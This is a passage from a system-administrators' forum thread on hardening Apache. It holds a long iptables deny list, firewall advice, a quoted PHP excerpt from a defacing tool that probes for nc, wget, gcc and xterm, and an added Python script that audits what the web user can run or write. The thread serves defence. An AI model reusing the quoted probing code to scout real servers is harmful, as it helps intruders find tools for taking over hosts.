$IPT -A INPUT -p ALL -s 193.203.240.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.206.78.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.226.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.255.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.43.88.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.106.45.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.126.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.150.208.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.29.142.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.42.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.63.250.0/24 -j DROP
$IPT -A INPUT -p ALL -s 194.95.249.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.137.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.132.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.140.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.165.93.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.171.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.177.242.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.199.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.251.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.123.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.252.72.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.35.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.42.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.48.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.54.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.56.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 195.95.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 196.200.57.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.173.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.54.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.66.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 198.69.255.0/24 -j DROP
$IPT -A INPUT -p ALL -s 199.227.113.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.105.251.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.110.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.123.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.126.83.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.17.53.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.179.34.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.21.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.250.54.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.252.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.27.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.28.128.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.29.0.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.30.74.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.45.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.50.15.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.58.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.66.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.74.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.79.75.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.85.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.115.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.94.197.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.96.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.134.134.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.227.89.0/24 -j DROP
$IPT -A INPUT -p ALL -s 201.27.49.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.125.42.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.133.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.142.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.150.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.174.109.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.177.25.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.181.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.222.30.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.28.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.58.85.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.71.104.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.75.4.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.128.7.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.198.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.130.232.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.142.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.146.102.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.172.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.31.191.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.63.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.79.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.11.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 204.202.22.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.134.236.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.237.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 205.252.5.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.82.0/24 -j DROP
$IPT -A INPUT -p ALL -s 206.225.87.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.210.64.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.138.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.139.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.58.161.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.71.17.0/24 -j DROP
$IPT -A INPUT -p ALL -s 208.186.169.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.123.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.126.144.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.133.117.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.135.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.147.114.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.189.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.190.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.215.164.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.249.12.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.55.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.66.146.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.117.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.118.97.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.131.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.139.227.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.155.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.201.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.232.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.32.67.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.36.108.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.160.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.55.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.58.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.64.86.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.166.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.69.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.71.84.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.73.103.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.227.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.127.58.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.148.180.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.15.6.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.153.59.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.159.152.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.107.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.135.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.143.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.165.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.176.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.20.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.216.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.218.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.226.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.230.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.243.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.253.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.160.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.173.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.172.186.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.174.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.19.43.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.198.196.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.221.217.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.204.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.6.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.65.209.0/24 -j DROP
$IPT -A INPUT -p ALL -s 222.124.24.0/24 -j DROP

Rgds...Geoff
Steven E. Protter
Exalted Contributor

Re: Securing Apache with Perl

You should not have to go through this.

I've got several publically exposed servers and manage to shut most of this down with firewall configuration.

I'm in the process of moving to a cluster that will also be behind a hardware based firewall.

I'd be interested to see your entire iptables configuration.

See my profile for a link, it would not be good to post here.

I have a firewall code generator script that might help. http://www.hpux.ws/firewall.tar.gz

You should be able to figure it out.

I've noted some flaws with iptables that seem to let traffic in on certain ports that are supposedly blocked after repeated pounding. That's why I'm moving my operation behind a hardware firewall.

SEP
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

Steven - I keep getting

Gateway Timeout
The following error occurred:
[code=GATEWAY_TIMEOUT] A gateway timeout occurred. The server is unreachable. Retry the request.

from your form - go to chat?

http://www.cmve.net/voc/voc.php

Rgds...Geoff
Steven E. Protter
Exalted Contributor
Solution

Re: Securing Apache with Perl

Sorry Geoff,

http://www.hpux.ws/firewall.tar.gz

I was offline for the last day of passover.

I will try and reach out to you in some way, mid morning your time after my Thursday workday is complete.

I've updated the scripts and included a few of the configuration files. I'm more than willing to work with you on this, because it's my own production code and I want it to work.

It's a very NOT permissive setup, but with a few entries for local networks it will play nicely with other boxes at your ISP.

I'm going to use your block list posted earlier on my new production servers, seems to make sense not to let known hackers in.

I've also run into some firewall performance problems when my firewall block list hits 100,000 records. I will make some improvements in the code as I move along and continue to post to the link above.

SEP
Geoff Wild
Honored Contributor

Re: Securing Apache with Perl

BTW - latest "defacing" tool now searches for gcc and cc - sheesh....

Here's an excerpt:

//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="xterm at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="nc at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="wget at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="lynx at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="gcc at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="cc at /usr/bin/cc ";


Safest bet is to move these to non standard directories that can only be found by root.

Rgds...Geoff
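Bill's advice earlier in the thread (lock perl down so only root and one non-Apache group can run it, and keep the web user from writing anywhere under the document root) and Geoff's note that the defacing tool just probes for xterm, nc, wget, lynx, gcc and cc at their usual paths both reduce to one question: what can the unprivileged web-server user execute or write? The script below is an added example, not code from this thread, from Apache or from Mambo. It models the plain owner/group/other permission bits for an assumed web uid/gid of 48 (Red Hat's apache user; change it to yours) and, because a test box is not your server, exercises itself against a constructed temporary tree instead of /usr/bin. Point audit_tools and audit_docroot at real paths with your real uid and gids to audit a live host.

```python
"""Audit what the unprivileged web-server user could execute or write.
Added example for this thread; not code from Apache, Mambo or the posters."""
import os
import shutil
import stat
import tempfile

# Assumption: the web server runs as uid/gid 48 (Red Hat's "apache").
WEB_UID = 48
WEB_GIDS = frozenset({48})

# The binaries the defacing tool quoted in the thread probes for, plus
# perl, at their conventional locations.
PROBED_TOOLS = (
    "/usr/bin/perl", "/usr/bin/wget", "/usr/bin/nc", "/usr/bin/lynx",
    "/usr/bin/gcc", "/usr/bin/cc", "/usr/X11R6/bin/xterm",
)


def _allowed(st, uid, gids, owner_bit, group_bit, other_bit):
    """Classic Unix owner/group/other check for one permission class.

    Deliberately ignores root's override, POSIX ACLs and capabilities:
    we are modelling the unprivileged web user, and a forgotten ACL is
    a finding for a different tool."""
    if st.st_uid == uid:
        return bool(st.st_mode & owner_bit)
    if st.st_gid in gids:
        return bool(st.st_mode & group_bit)
    return bool(st.st_mode & other_bit)


def executable_by(path, uid=WEB_UID, gids=WEB_GIDS):
    """True if a regular file exists at path and uid could execute it."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and _allowed(
        st, uid, gids, stat.S_IXUSR, stat.S_IXGRP, stat.S_IXOTH)


def writable_by(path, uid=WEB_UID, gids=WEB_GIDS):
    """True if uid could write to the file or directory at path."""
    st = os.lstat(path)
    return _allowed(st, uid, gids, stat.S_IWUSR, stat.S_IWGRP, stat.S_IWOTH)


def audit_tools(tools=PROBED_TOOLS, uid=WEB_UID, gids=WEB_GIDS):
    """The tools the web user could run: the attacker's shopping list."""
    return [t for t in tools if executable_by(t, uid, gids)]


def audit_docroot(root, uid=WEB_UID, gids=WEB_GIDS):
    """Every directory or file under root the web user could write.
    Anything listed here is a place a fetched cmd.txt could land."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for p in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            if writable_by(p, uid, gids):
                hits.append(p)
    return sorted(hits)


def build_demo_tree():
    """Constructed fixture. Everything is owned by the current user, who is
    not uid 48, so the modelled web user falls through to the 'other'
    bits: a fake bin/ where perl is 0750 and wget is 0755, and a docroot
    with one world-writable uploads/ directory."""
    base = tempfile.mkdtemp(prefix="apache-audit-")
    bindir = os.path.join(base, "bin")
    os.mkdir(bindir)
    for name, mode in (("perl", 0o750), ("wget", 0o755)):
        with open(os.path.join(bindir, name), "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(os.path.join(bindir, name), mode)
    docroot = os.path.join(base, "htdocs")
    os.makedirs(os.path.join(docroot, "uploads"))
    with open(os.path.join(docroot, "index.php"), "w") as fh:
        fh.write("<?php ?>\n")
    os.chmod(docroot, 0o755)
    os.chmod(os.path.join(docroot, "index.php"), 0o644)
    os.chmod(os.path.join(docroot, "uploads"), 0o777)
    return {"base": base, "bin": bindir, "docroot": docroot,
            "perl": os.path.join(bindir, "perl"),
            "wget": os.path.join(bindir, "wget"),
            "uploads": os.path.join(docroot, "uploads")}


if __name__ == "__main__":
    tree = build_demo_tree()
    try:
        print("web user can run:", audit_tools((tree["perl"], tree["wget"])))
        print("web user can write:", audit_docroot(tree["docroot"]))
    finally:
        shutil.rmtree(tree["base"])
```

Moving wget or gcc out of PATH only defeats the hard-coded file_exists() probe; once an attacker has a shell, `find / -perm -o+x` turns the binary up again. Removing the execute bit for the web user, as Bill suggests for perl, is what actually stops it, and the audit above is how you confirm the change took.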